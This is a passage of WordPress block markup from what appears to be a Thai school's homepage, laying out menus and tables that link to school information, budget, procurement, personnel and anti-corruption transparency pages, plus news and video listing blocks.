{\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\" data-type=\"page\" data-id=\"650\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_95f155-a6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_95f155-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=656\" data-type=\"page\" data-id=\"656\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":758,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-2.png\" alt=\"\" class=\"wp-image-758\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?post_type=popupbuilder&amp;p=328\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=542\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=506\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=337\">Q&amp;A</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=780\" data-type=\"page\" data-id=\"780\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=824\">แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=703\" data-type=\"page\" data-id=\"703\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=784\" data-type=\"page\" data-id=\"784\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=771\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=776\" data-type=\"page\" data-id=\"776\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=840\" data-type=\"page\" data-id=\"840\">รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong>รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=716\" data-type=\"page\" data-id=\"716\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=680\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=708\" data-type=\"page\" data-id=\"708\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=828\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=831\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=836\">รายงานการรับทรัพย์สินหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"bohtnagp\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showThumbnail\":false,\"showTaxonomy\":false,\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"showPagination\":true,\"titleTag\":\"h6\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingBgColor\":\"#ff6900\",\"titleHoverColor\":\"#ff6900\",\"titleBgColor\":\"#ffffff\",\"titleHoverBgColor\":\"#ffffff\",\"titleWeight\":\"500\",\"titlefStyle\":\"\",\"titleTran\":\"\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#130b0b\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\"